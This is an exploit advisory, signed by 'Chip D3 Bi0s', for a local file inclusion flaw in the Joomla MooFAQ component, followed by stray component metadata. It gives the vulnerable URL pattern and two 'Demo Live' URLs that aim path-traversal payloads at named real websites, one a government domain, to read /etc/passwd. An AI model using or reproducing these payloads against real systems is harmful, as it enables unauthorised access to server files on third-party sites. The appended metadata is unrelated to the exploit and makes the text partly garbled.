---------------------------------------------------------------------- Joomla Component MooFAQ Local File Inclusion Vulnerability ---------------------------------------------------------------------- ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Vulnerability : LFI ################################################### ________________________________________________________ Example: http://localHost/path/components/com_moofaq/includes/file_includer.php?gzip=0&file=[LFI] Demo Live (1): http://www.paginaswebhonduras.com/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd Demo Live (2): http://www.uers.gov.do/components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd ++++++++++++++++++++++++++++++++ [!] Produced in South America -------------------------------- FAQ Component using mooTools 20 July 2007 1.0 1.0.13 Douglas Machado Douglas Machado falecom@focalizaisso.com.br opensource.focalizaisso.com.br config.png http://opensource.focalizaisso.com.br/ http://opensource.focalizaisso.com.br/